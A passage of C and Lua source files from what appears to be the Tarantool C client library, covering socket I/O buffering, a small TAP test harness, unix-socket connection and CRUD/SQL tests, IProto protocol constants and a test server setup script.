r = send(s->fd, buf + off, size - off, 0);
} while (r == -1 && (errno == EINTR));
}
if (r <= 0) {
s->error = TNT_ESYSTEM;
s->errno_ = errno;
return -1;
}
off += r;
} while (off != size && all);
return off;
}
ssize_t
tnt_io_sendv_raw(struct tnt_stream_net *s, struct iovec *iov, int count, int all)
{
size_t total = 0;
while (count > 0) {
ssize_t r;
if (s->sbuf.txv) {
r = s->sbuf.txv(&s->sbuf, iov, MIN(count, getiovmax()));
} else {
do {
r = writev(s->fd, iov, count);
} while (r == -1 && (errno == EINTR));
}
if (r <= 0) {
s->error = TNT_ESYSTEM;
s->errno_ = errno;
return -1;
}
total += r;
if (!all)
break;
while (count > 0) {
if (iov->iov_len > (size_t)r) {
iov->iov_base += r;
iov->iov_len -= r;
break;
} else {
r -= iov->iov_len;
iov++;
count--;
}
}
}
return total;
}
ssize_t
tnt_io_send(struct tnt_stream_net *s, const char *buf, size_t size)
{
if (s->sbuf.buf == NULL)
return tnt_io_send_raw(s, buf, size, 1);
if (size > s->sbuf.size) {
s->error = TNT_EBIG;
return -1;
}
if ((s->sbuf.off + size) <= s->sbuf.size) {
memcpy(s->sbuf.buf + s->sbuf.off, buf, size);
s->sbuf.off += size;
return size;
}
ssize_t r = tnt_io_send_raw(s, s->sbuf.buf, s->sbuf.off, 1);
if (r == -1)
return -1;
s->sbuf.off = size;
memcpy(s->sbuf.buf, buf, size);
return size;
}
inline static void
tnt_io_sendv_put(struct tnt_stream_net *s, struct iovec *iov, int count) {
int i;
for (i = 0 ; i < count ; i++) {
memcpy(s->sbuf.buf + s->sbuf.off,
iov[i].iov_base,
iov[i].iov_len);
s->sbuf.off += iov[i].iov_len;
}
}
ssize_t
tnt_io_sendv(struct tnt_stream_net *s, struct iovec *iov, int count)
{
if (s->sbuf.buf == NULL)
return tnt_io_sendv_raw(s, iov, count, 1);
size_t size = 0;
int i;
for (i = 0 ; i < count ; i++)
size += iov[i].iov_len;
if (size > s->sbuf.size) {
s->error = TNT_EBIG;
return -1;
}
if ((s->sbuf.off + size) <= s->sbuf.size) {
tnt_io_sendv_put(s, iov, count);
return size;
}
ssize_t r = tnt_io_send_raw(s, s->sbuf.buf, s->sbuf.off, 1);
if (r == -1)
return -1;
s->sbuf.off = 0;
tnt_io_sendv_put(s, iov, count);
return size;
}
ssize_t
tnt_io_recv_raw(struct tnt_stream_net *s, char *buf, size_t size, int all)
{
size_t off = 0;
do {
ssize_t r;
if (s->rbuf.tx) {
r = s->rbuf.tx(&s->rbuf, buf + off, size - off);
} else {
do {
r = recv(s->fd, buf + off, size - off, 0);
} while (r == -1 && (errno == EINTR));
}
if (r <= 0) {
s->error = TNT_ESYSTEM;
s->errno_ = errno;
return -1;
}
off += r;
} while (off != size && all);
return off;
}
ssize_t
tnt_io_recv(struct tnt_stream_net *s, char *buf, size_t size)
{
if (s->rbuf.buf == NULL)
return tnt_io_recv_raw(s, buf, size, 1);
size_t lv, rv, off = 0, left = size;
while (1) {
if ((s->rbuf.off + left) <= s->rbuf.top) {
memcpy(buf + off, s->rbuf.buf + s->rbuf.off, left);
s->rbuf.off += left;
return size;
}
lv = s->rbuf.top - s->rbuf.off;
rv = left - lv;
if (lv) {
memcpy(buf + off, s->rbuf.buf + s->rbuf.off, lv);
off += lv;
}
s->rbuf.off = 0;
ssize_t top = tnt_io_recv_raw(s, s->rbuf.buf, s->rbuf.size, 0);
if (top <= 0) {
s->errno_ = errno;
s->error = TNT_ESYSTEM;
return -1;
}
s->rbuf.top = top;
if (rv <= s->rbuf.top) {
memcpy(buf + off, s->rbuf.buf, rv);
s->rbuf.off = rv;
return size;
}
left -= lv;
}
return -1;
}
int getiovmax()
{
#if defined(IOV_MAX)
return IOV_MAX;
#elif defined(_SC_IOV_MAX)
static int iovmax = -1;
if (iovmax == -1) {
iovmax = sysconf(_SC_IOV_MAX);
/* On some embedded devices (arm-linux-uclibc based ip camera),
* sysconf(_SC_IOV_MAX) can not get the correct value. The return
* value is -1 and the errno is EINPROGRESS. Degrade the value to 1.
*/
if (iovmax == -1) iovmax = 1;
}
return iovmax;
#elif defined(UIO_MAXIOV)
return UIO_MAXIOV;
#else
return 1024;
#endif
}
<|start_filename|>test/common/test.h<|end_filename|>
#ifndef TEST_H_INCLUDED
#define TEST_H_INCLUDED
#include <stdio.h>
/**
@brief example
@code
#include "test.h"
int main(void) {
plan(3); // count of test You planned to check
ok(1, "Test name 1");
is(4, 2 * 2, "2 * 2 == 4");
isnt(5, 2 * 2, "2 * 2 != 5);
return check_plan(); // print resume
}
@endcode
*/
/* private function, use ok(...) instead */
int __ok(int condition, const char *fmt, ...);
/* private function, use note(...) or diag(...) instead */
void __space(FILE *stream);
#define msg(stream, ...) ({ __space(stream); fprintf(stream, "# "); \
fprintf(stream, __VA_ARGS__); fprintf(stream, "\n"); })
#define note(...) msg(stdout, __VA_ARGS__)
#define diag(...) msg(stderr, __VA_ARGS__)
/**
@brief set and print plan
@param count
Before anything else, you need a testing plan. This basically declares
how many tests your program is going to run to protect against premature
failure.
*/
void plan(int count);
/**
@brief check if plan is reached and print report
*/
int check_plan(void);
#define ok(condition, fmt, args...) { \
int res = __ok(condition, fmt, ##args); \
if (!res) { \
__space(stderr); \
fprintf(stderr, "# Failed test '"); \
fprintf(stderr, fmt, ##args); \
fprintf(stderr, "'\n"); \
__space(stderr); \
fprintf(stderr, "# in %s at line %d\n", __FILE__, __LINE__); \
} \
res = res; \
}
#define is(a, b, fmt, args...) { \
int res = __ok((a) == (b), fmt, ##args); \
if (!res) { \
__space(stderr); \
fprintf(stderr, "# Failed test '"); \
fprintf(stderr, fmt, ##args); \
fprintf(stderr, "'\n"); \
__space(stderr); \
fprintf(stderr, "# in %s at line %d\n", __FILE__, __LINE__); \
} \
res = res; \
}
#define isnt(a, b, fmt, args...) { \
int res = __ok((a) != (b), fmt, ##args); \
if (!res) { \
__space(stderr); \
fprintf(stderr, "# Failed test '"); \
fprintf(stderr, fmt, ##args); \
fprintf(stderr, "'\n"); \
__space(stderr); \
fprintf(stderr, "# in %s at line %d\n", __FILE__, __LINE__); \
} \
res = res; \
}
#define fail(fmt, args...) \
ok(0, fmt, ##args)
#define skip(fmt, args...) \
ok(1, "Skipping: " fmt, ##args)
#endif /* TEST_H_INCLUDED */
<|start_filename|>test/unix/tarantool_unix.c<|end_filename|>
#include "test.h"
#include <string.h>
#include <stdlib.h>
#include <stdint.h>
#include <tarantool/tarantool.h>
#include <tarantool/tnt_net.h>
#include <tarantool/tnt_opt.h>
#include <uri.h> /* for tnt_set_credentials() */
#include "common.h"
#define header() note("*** %s: prep ***", __func__)
#define footer() note("*** %s: done ***", __func__)
/* XXX: Cannot use user:pass@unix/:/path/to/socket (gh-120). */
static void
tnt_set_credentials(struct tnt_stream *s, const char *login,
const char *password)
{
struct tnt_stream_net *sn = TNT_SNET_CAST(s);
struct uri *uri = sn->opt.uri;
uri->login = login;
uri->login_len = strlen(login);
uri->password = password;
uri->password_len = strlen(password);
}
static int
test_connect_unix(const char *uri) {
plan(3);
header();
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
// isnt(tnt_authenticate(tnt), -1, "Authenticating");
tnt_stream_free(tnt);
footer();
return check_plan();
}
static int
test_ping(const char *uri) {
plan(7);
header();
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
// isnt(tnt_authenticate(tnt), -1, "Authenticating");
isnt(tnt_ping(tnt), -1, "Create ping");
isnt(tnt_flush(tnt), -1, "Send to server");
struct tnt_reply reply;
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
tnt_reply_free(&reply);
tnt_stream_free(tnt);
footer();
return check_plan();
}
static int
test_auth_call(const char *uri) {
plan(21);
header();
struct tnt_stream *args = NULL; args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[]"), -1, "check object filling");
struct tnt_reply reply;
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
// isnt(tnt_authenticate(tnt), -1, "Authenticating");
isnt(tnt_deauth(tnt), -1, "Create deauth");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is(reply.error, NULL, "Check error absence");
tnt_reply_free(&reply);
isnt(tnt_call_16(tnt, "test_4", 6, args), -1, "Create call request");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
tnt_reply_free(&reply);
isnt(tnt_auth(tnt, "test", 4, "test", 4), -1, "Create auth");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
tnt_reply_free(&reply);
isnt(tnt_eval(tnt, "return test_4()", 15, args), -1, "Create eval "
"request");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
tnt_stream_free(args);
tnt_reply_free(&reply);
tnt_stream_free(tnt);
footer();
return check_plan();
}
static int
test_insert_replace_delete(const char *uri) {
plan(186);
header();
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
// isnt(tnt_authenticate(tnt), -1, "Authenticating");
tnt_stream_reqid(tnt, 0);
for (int i = 0; i < 10; ++i) {
char ex[128] = {0};
size_t ex_len = snprintf(ex, 128, "examplestr %d %d", i, i*i);
struct tnt_stream *val = tnt_object(NULL);
tnt_object_format(val, "[%d%d%.*s]", i, i + 10, ex_len, ex);
tnt_insert(tnt, 512, val);
tnt_stream_free(val);
}
isnt(tnt_flush(tnt), -1, "Send package to server");
struct tnt_iter it;
tnt_iter_reply(&it, tnt);
while (tnt_next(&it)) {
struct tnt_reply *r = TNT_IREPLY_PTR(&it);
uint32_t i = r->sync, str_len = 0;
char ex[128] = {0};
size_t ex_len = snprintf(ex, 128, "examplestr %d %d", i, i*i);
isnt(r->data, NULL, "check that we get answer");
const char *data = r->data;
is (mp_typeof(*data), MP_ARRAY, "Check array");
is (mp_decode_array(&data), 1, "Check array, again");
is (mp_decode_array(&data), 3, "And again (another)");
ok (mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i &&
mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i + 10 &&
mp_typeof(*data) == MP_STR &&
strncmp(mp_decode_str(&data, &str_len), ex, ex_len) == 0,
"Check fields");
}
tnt_stream_reqid(tnt, 0);
for (int i = 0; i < 5; ++i) {
char ex[128] = {0};
size_t ex_len;
ex_len = snprintf(ex, 128, "anotherexamplestr %d %d", i, i*i);
struct tnt_stream *val = tnt_object(NULL);
tnt_object_format(val, "[%d%d%.*s]", i, i + 5, ex_len, ex);
tnt_replace(tnt, 512, val);
tnt_stream_free(val);
}
isnt(tnt_flush(tnt), -1, "Send package to server");
tnt_iter_reply(&it, tnt);
while (tnt_next(&it)) {
struct tnt_reply *r = TNT_IREPLY_PTR(&it);
uint32_t i = r->sync, str_len = 0;
char ex[128] = {0};
size_t ex_len;
ex_len = snprintf(ex, 128, "anotherexamplestr %d %d", i, i*i);
isnt(r->data, NULL, "check that we get answer");
const char *data = r->data;
is (mp_typeof(*data), MP_ARRAY, "Check array");
is (mp_decode_array(&data), 1, "Check array, again");
is (mp_decode_array(&data), 3, "And again (another)");
ok (mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i &&
mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i + 5 &&
mp_typeof(*data) == MP_STR &&
strncmp(mp_decode_str(&data, &str_len), ex, ex_len) == 0,
"Check fields");
}
struct tnt_stream *key = NULL; key = tnt_object(NULL);
isnt(key, NULL, "Check object creation");
is (tnt_object_add_array(key, 0), 1, "Create key");
tnt_select(tnt, 512, 0, UINT32_MAX, 0, 0, key);
tnt_stream_free(key);
tnt_flush(tnt);
struct tnt_reply reply; tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply");
const char *data = reply.data;
is (mp_typeof(*data), MP_ARRAY, "Check array");
uint32_t vsz = mp_decode_array(&data);
is (vsz, 10, "Check array, again");
uint32_t arrsz = vsz;
uint32_t str_len = 0;
while (arrsz-- > 0) {
is (mp_decode_array(&data), 3, "And again (another)");
is (mp_typeof(*data), MP_UINT, "check int");
uint32_t sz = mp_decode_uint(&data);
is (mp_typeof(*data), MP_UINT, "check int");
uint32_t sz_z = sz + 10; if (sz < 5) sz_z -= 5;
uint32_t vsz = mp_decode_uint(&data);
is (vsz, sz_z, "check int val");
char ex[128] = {0};
size_t ex_len = 0;
if (sz < 5)
ex_len = snprintf(ex, 128, "anotherexamplestr %d %d",
sz, sz*sz);
else
ex_len = snprintf(ex, 128, "examplestr %d %d", sz, sz*sz);
ok (mp_typeof(*data) == MP_STR &&
strncmp(mp_decode_str(&data, &str_len), ex, ex_len) == 0,
"Check str");
}
tnt_reply_free(&reply);
tnt_stream_reqid(tnt, 0);
for (int i = 0; i < 10; ++i) {
struct tnt_stream *key = tnt_object(NULL);
tnt_object_format(key, "[%d]", i);
tnt_delete(tnt, 512, 0, key);
tnt_stream_free(key);
}
isnt(tnt_flush(tnt), -1, "Send package to server");
tnt_iter_reply(&it, tnt);
while (tnt_next(&it)) {
struct tnt_reply *r = TNT_IREPLY_PTR(&it);
uint32_t i = r->sync, str_len = 0, nlen = (i < 5 ? i + 5 : i + 10);
char ex[128] = {0};
size_t ex_len = 0;
if (i < 5)
ex_len = snprintf(ex, 128, "anotherexamplestr %d %d",
i, i*i);
else
ex_len = snprintf(ex, 128, "examplestr %d %d", i, i*i);
isnt(r->data, NULL, "check that we get answer");
const char *data = r->data;
is (mp_typeof(*data), MP_ARRAY, "Check array");
is (mp_decode_array(&data), 1, "Check array, again");
is (mp_decode_array(&data), 3, "And again (another)");
ok (mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == i &&
mp_typeof(*data) == MP_UINT &&
mp_decode_uint(&data) == nlen &&
mp_typeof(*data) == MP_STR &&
strncmp(mp_decode_str(&data, &str_len), ex, ex_len) == 0,
"Check fields");
}
tnt_stream_free(tnt);
footer();
return check_plan();
}
static int
test_execute(const char *uri) {
plan(39);
header();
struct tnt_reply reply;
char *query;
struct tnt_stream *args = NULL;
struct tnt_stream *tnt = NULL; tnt = tnt_net(NULL);
isnt(tnt, NULL, "Check connection creation");
isnt(tnt_set(tnt, TNT_OPT_URI, uri), -1, "Setting URI");
tnt_set_credentials(tnt, "test", "test");
isnt(tnt_connect(tnt), -1, "Connecting");
/* Skip tests on Tarantool 1x. */
struct tnt_stream_net *sn = TNT_SNET_CAST(tnt);
if (strncmp(sn->greeting, "Tarantool 1.", 12) == 0) {
tnt_stream_free(tnt);
for (int i = 0; i < 36; ++i)
skip("Tarantool 2x required");
footer();
return check_plan();
}
args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[]"), -1, "check object filling");
query = "CREATE TABLE test_table(id INTEGER, PRIMARY KEY (id))";
isnt(tnt_execute(tnt, query, strlen(query), args), -1,
"Create execute sql request: create table");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_stream_free(args);
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
isnt(reply.sqlinfo, NULL, "Check sqlinfo presence");
is (reply.metadata, NULL, "Check metadata absence");
is (reply.data, NULL, "Check data absence");
tnt_reply_free(&reply);
args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[%d]", 0), -1, "check object filling");
query = "INSERT INTO test_table(id) VALUES (?)";
isnt(tnt_execute(tnt, query, strlen(query), args), -1,
"Create execute sql request: insert row");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_stream_free(args);
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
isnt(reply.sqlinfo, NULL, "Check sqlinfo presence");
is (reply.metadata, NULL, "Check metadata absence");
is (reply.data, NULL, "Check data absence");
tnt_reply_free(&reply);
args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[]"), -1, "check object filling");
query = "select * from test_table";
isnt(tnt_execute(tnt, query, strlen(query), args), -1,
"Create execute sql request: select");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_stream_free(args);
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
is (reply.sqlinfo, NULL, "Check sqlinfo absence");
isnt(reply.metadata, NULL, "Check metadata presence");
isnt(reply.data, NULL, "Check data presence");
tnt_reply_free(&reply);
args = tnt_object(NULL);
isnt(args, NULL, "Check object creation");
isnt(tnt_object_format(args, "[]"), -1, "check object filling");
query = "drop table test_table";
isnt(tnt_execute(tnt, query, strlen(query), args), -1,
"Create execute sql request: drop table");
isnt(tnt_flush(tnt), -1, "Send to server");
tnt_stream_free(args);
tnt_reply_init(&reply);
isnt(tnt->read_reply(tnt, &reply), -1, "Read reply from server");
is (reply.error, NULL, "Check error absence");
isnt(reply.sqlinfo, NULL, "Check sqlinfo presence");
is (reply.metadata, NULL, "Check metadata absence");
is (reply.data, NULL, "Check data absence");
tnt_reply_free(&reply);
tnt_stream_free(tnt);
footer();
return check_plan();
}
int main() {
plan(5);
/*
* XXX: Cannot use user:pass@unix/:/path/to/socket
* (gh-120).
*/
const char *uri = getenv("LISTEN");
/* Ensure the uri contains unix socket. */
assert(strstr(uri, "/") != NULL);
test_connect_unix(uri);
test_ping(uri);
test_auth_call(uri);
test_insert_replace_delete(uri);
test_execute(uri);
return check_plan();
}
<|start_filename|>include/tarantool/tnt_proto.h<|end_filename|>
#ifndef TNT_PROTO_H_INCLUDED
#define TNT_PROTO_H_INCLUDED
/*
* Redistribution and use in source and binary forms, with or
* without modification, are permitted provided that the following
* conditions are met:
*
* 1. Redistributions of source code must retain the above
* copyright notice, this list of conditions and the
* following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials
* provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY <COPYRIGHT HOLDER> ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL
* <COPYRIGHT HOLDER> OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
* INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
* BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*/
/**
* \file tnt_proto.h
* \brief IProto protocol constants
*/
/**
* \brief Request/response header field types (keys)
*/
enum tnt_header_key_t {
TNT_CODE = 0x00,
TNT_SYNC = 0x01,
TNT_SERVER_ID = 0x02,
TNT_LSN = 0x03,
TNT_TIMESTAMP = 0x04,
TNT_SCHEMA_ID = 0x05
};
/**
* \brief Request body field types (keys)
*/
enum tnt_body_key_t {
TNT_SPACE = 0x10,
TNT_INDEX = 0x11,
TNT_LIMIT = 0x12,
TNT_OFFSET = 0x13,
TNT_ITERATOR = 0x14,
TNT_INDEX_BASE = 0x15,
TNT_KEY = 0x20,
TNT_TUPLE = 0x21,
TNT_FUNCTION = 0x22,
TNT_USERNAME = 0x23,
TNT_SERVER_UUID = 0x24,
TNT_CLUSTER_UUID = 0x25,
TNT_VCLOCK = 0x26,
TNT_EXPRESSION = 0x27,
TNT_OPS = 0x28,
TNT_SQL_TEXT = 0x40,
TNT_SQL_BIND = 0x41,
};
enum tnt_response_type_t {
TNT_OK = 0x00,
TNT_CHUNK = 0x80,
};
/**
* \brief Response body field types (keys)
*/
enum tnt_response_key_t {
TNT_DATA = 0x30,
TNT_ERROR = 0x31,
TNT_METADATA = 0x32,
TNT_SQL_INFO = 0x42,
};
/**
* \brief Request types
*/
enum tnt_request_t {
TNT_OP_SELECT = 1,
TNT_OP_INSERT = 2,
TNT_OP_REPLACE = 3,
TNT_OP_UPDATE = 4,
TNT_OP_DELETE = 5,
TNT_OP_CALL_16 = 6,
TNT_OP_AUTH = 7,
TNT_OP_EVAL = 8,
TNT_OP_UPSERT = 9,
TNT_OP_CALL = 10,
TNT_OP_EXECUTE = 11,
TNT_OP_PING = 64,
TNT_OP_JOIN = 65,
TNT_OP_SUBSCRIBE = 66
};
/**
* \brief Update operations
*/
enum tnt_update_op_t {
TNT_UOP_ADDITION = '+',
TNT_UOP_SUBSTRACT = '-',
TNT_UOP_AND = '&',
TNT_UOP_XOR = '^',
TNT_UOP_OR = '|',
TNT_UOP_DELETE = '#',
TNT_UOP_INSERT = '!',
TNT_UOP_ASSIGN = '=',
TNT_UOP_SPLICE = ':',
};
/**
* \brief Iterator types
*/
enum tnt_iterator_t {
TNT_ITER_EQ = 0,
TNT_ITER_REQ,
TNT_ITER_ALL,
TNT_ITER_LT,
TNT_ITER_LE,
TNT_ITER_GE,
TNT_ITER_GT,
TNT_ITER_BITS_ALL_SET,
TNT_ITER_BITS_ANY_SET,
TNT_ITER_BITS_ALL_NOT_SET,
TNT_ITER_OVERLAP,
TNT_ITER_NEIGHBOR,
};
/**
* \internal
*/
#define TNT_SCRAMBLE_SIZE 20
/**
* \internal
*/
#define TNT_GREETING_SIZE 128
/**
* \internal
*/
#define TNT_VERSION_SIZE 64
/**
* \internal
*/
#define TNT_SALT_SIZE 44
/**
* \brief System spaces
*/
enum tnt_spaces_t {
tnt_sp_space = 280,
tnt_sp_index = 288,
tnt_sp_func = 296,
tnt_sp_user = 304,
tnt_sp_priv = 312,
tnt_vsp_space = 281,
tnt_vsp_index = 289,
tnt_vsp_func = 297,
tnt_vsp_user = 305,
tnt_vsp_priv = 313,
};
/**
* \brief System indexes
*/
enum tnt_indexes_t {
tnt_vin_primary = 0,
tnt_vin_owner = 1,
tnt_vin_name = 2,
};
/**
* \brief Error code types
*/
enum tnt_errcode_t {
TNT_ER_UNKNOWN = 0,
TNT_ER_ILLEGAL_PARAMS = 1,
TNT_ER_MEMORY_ISSUE = 2,
TNT_ER_TUPLE_FOUND = 3,
TNT_ER_TUPLE_NOT_FOUND = 4,
TNT_ER_UNSUPPORTED = 5,
TNT_ER_NONMASTER = 6,
TNT_ER_READONLY = 7,
TNT_ER_INJECTION = 8,
TNT_ER_CREATE_SPACE = 9,
TNT_ER_SPACE_EXISTS = 10,
TNT_ER_DROP_SPACE = 11,
TNT_ER_ALTER_SPACE = 12,
TNT_ER_INDEX_TYPE = 13,
TNT_ER_MODIFY_INDEX = 14,
TNT_ER_LAST_DROP = 15,
TNT_ER_TUPLE_FORMAT_LIMIT = 16,
TNT_ER_DROP_PRIMARY_KEY = 17,
TNT_ER_KEY_PART_TYPE = 18,
TNT_ER_EXACT_MATCH = 19,
TNT_ER_INVALID_MSGPACK = 20,
TNT_ER_PROC_RET = 21,
TNT_ER_TUPLE_NOT_ARRAY = 22,
TNT_ER_FIELD_TYPE = 23,
TNT_ER_FIELD_TYPE_MISMATCH = 24,
TNT_ER_SPLICE = 25,
TNT_ER_ARG_TYPE = 26,
TNT_ER_TUPLE_IS_TOO_LONG = 27,
TNT_ER_UNKNOWN_UPDATE_OP = 28,
TNT_ER_UPDATE_FIELD = 29,
TNT_ER_FIBER_STACK = 30,
TNT_ER_KEY_PART_COUNT = 31,
TNT_ER_PROC_LUA = 32,
TNT_ER_NO_SUCH_PROC = 33,
TNT_ER_NO_SUCH_TRIGGER = 34,
TNT_ER_NO_SUCH_INDEX = 35,
TNT_ER_NO_SUCH_SPACE = 36,
TNT_ER_NO_SUCH_FIELD = 37,
TNT_ER_SPACE_FIELD_COUNT = 38,
TNT_ER_INDEX_FIELD_COUNT = 39,
TNT_ER_WAL_IO = 40,
TNT_ER_MORE_THAN_ONE_TUPLE = 41,
TNT_ER_ACCESS_DENIED = 42,
TNT_ER_CREATE_USER = 43,
TNT_ER_DROP_USER = 44,
TNT_ER_NO_SUCH_USER = 45,
TNT_ER_USER_EXISTS = 46,
TNT_ER_PASSWORD_MISMATCH = 47,
TNT_ER_UNKNOWN_REQUEST_TYPE = 48,
TNT_ER_UNKNOWN_SCHEMA_OBJECT = 49,
TNT_ER_CREATE_FUNCTION = 50,
TNT_ER_NO_SUCH_FUNCTION = 51,
TNT_ER_FUNCTION_EXISTS = 52,
TNT_ER_FUNCTION_ACCESS_DENIED = 53,
TNT_ER_FUNCTION_MAX = 54,
TNT_ER_SPACE_ACCESS_DENIED = 55,
TNT_ER_USER_MAX = 56,
TNT_ER_NO_SUCH_ENGINE = 57,
TNT_ER_RELOAD_CFG = 58,
TNT_ER_CFG = 59,
TNT_ER_SOPHIA = 60,
TNT_ER_LOCAL_SERVER_IS_NOT_ACTIVE = 61,
TNT_ER_UNKNOWN_SERVER = 62,
TNT_ER_CLUSTER_ID_MISMATCH = 63,
TNT_ER_INVALID_UUID = 64,
TNT_ER_CLUSTER_ID_IS_RO = 65,
TNT_ER_RESERVED66 = 66,
TNT_ER_SERVER_ID_IS_RESERVED = 67,
TNT_ER_INVALID_ORDER = 68,
TNT_ER_MISSING_REQUEST_FIELD = 69,
TNT_ER_IDENTIFIER = 70,
TNT_ER_DROP_FUNCTION = 71,
TNT_ER_ITERATOR_TYPE = 72,
TNT_ER_REPLICA_MAX = 73,
TNT_ER_INVALID_XLOG = 74,
TNT_ER_INVALID_XLOG_NAME = 75,
TNT_ER_INVALID_XLOG_ORDER = 76,
TNT_ER_NO_CONNECTION = 77,
TNT_ER_TIMEOUT = 78,
TNT_ER_ACTIVE_TRANSACTION = 79,
TNT_ER_NO_ACTIVE_TRANSACTION = 80,
TNT_ER_CROSS_ENGINE_TRANSACTION = 81,
TNT_ER_NO_SUCH_ROLE = 82,
TNT_ER_ROLE_EXISTS = 83,
TNT_ER_CREATE_ROLE = 84,
TNT_ER_INDEX_EXISTS = 85,
TNT_ER_TUPLE_REF_OVERFLOW = 86,
TNT_ER_ROLE_LOOP = 87,
TNT_ER_GRANT = 88,
TNT_ER_PRIV_GRANTED = 89,
TNT_ER_ROLE_GRANTED = 90,
TNT_ER_PRIV_NOT_GRANTED = 91,
TNT_ER_ROLE_NOT_GRANTED = 92,
TNT_ER_MISSING_SNAPSHOT = 93,
TNT_ER_CANT_UPDATE_PRIMARY_KEY = 94,
TNT_ER_UPDATE_INTEGER_OVERFLOW = 95,
TNT_ER_GUEST_USER_PASSWORD = 96,
TNT_ER_TRANSACTION_CONFLICT = 97,
TNT_ER_UNSUPPORTED_ROLE_PRIV = 98,
TNT_ER_LOAD_FUNCTION = 99,
TNT_ER_FUNCTION_LANGUAGE = 100,
TNT_ER_RTREE_RECT = 101,
TNT_ER_PROC_C = 102,
TNT_ER_UNKNOWN_RTREE_INDEX_DISTANCE_TYPE = 103,
TNT_ER_PROTOCOL = 104,
TNT_ER_UPSERT_UNIQUE_SECONDARY_KEY = 105,
TNT_ER_WRONG_INDEX_RECORD = 106,
TNT_ER_WRONG_INDEX_PARTS = 107,
TNT_ER_WRONG_INDEX_OPTIONS = 108,
TNT_ER_WRONG_SCHEMA_VERSION = 109,
TNT_ER_SLAB_ALLOC_MAX = 110,
};
#endif /* TNT_PROTO_H_INCLUDED */
<|start_filename|>test/common/box.lua<|end_filename|>
#!/usr/bin/env tarantool
local os = require('os')
local fiber = require('fiber')
local console = require('console')
box.cfg{
listen = os.getenv('LISTEN'),
}
console.listen(os.getenv('ADMIN'))
lp = {
test = 'test',
test_empty = '',
test_big = string.rep('1234567890', 6)
}
box.once('init', function()
for k, v in pairs(lp) do
box.schema.user.create(k, { password = v })
if k == 'test' then
-- Read and write are needed due to Tarantool
-- 1.7.6-27-g7ef5be2 in CI and
-- https://github.com/tarantool/tarantool/issues/3017
-- Create grant is needed to create a table with tnt_execute().
box.schema.user.grant('test', 'read,write,execute,create',
'universe')
end
end
local test = box.schema.space.create('test')
test:create_index('primary', {type = 'TREE', unique = true, parts = {1, 'unsigned'}})
test:create_index('secondary', {type = 'TREE', unique = false, parts = {2, 'unsigned', 3, 'string'}})
